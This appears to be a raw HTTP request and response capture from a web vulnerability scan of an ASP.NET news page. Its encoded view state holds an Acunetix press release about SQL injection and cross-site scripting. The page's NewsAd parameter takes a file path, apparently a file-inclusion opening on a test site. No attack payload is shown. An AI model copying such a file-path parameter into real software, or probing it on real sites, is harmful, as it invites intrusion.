aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKx7LcVAv6Q%2FOMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAwK%2Fk%2F%2FECQK%2Fk%2F%2FECQK%2Fk5ObAQK%2Fk5ObAQK%2Fk4e%2BCgK%2Fk4e%2BCgK%2Fk7vVAwK%2Fk7vVAwK%2Fk6%2FoDAK%2Fk6%2FoDAK%2Fk8OMBAK%2Fk8OMBAK%2Fk%2FejDQK%2Fk%2FejDQK%2Fk%2BvGBgK%2Fk%2BvGBgK%2Fk9%2BvAwK%2Fk9%2BvAwK%2Fk%2FPCDAK%2Fk%2FPCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ%2BAkCkLqZ%2BAkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X%2FqqjYsEEZ5ETd0S8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVk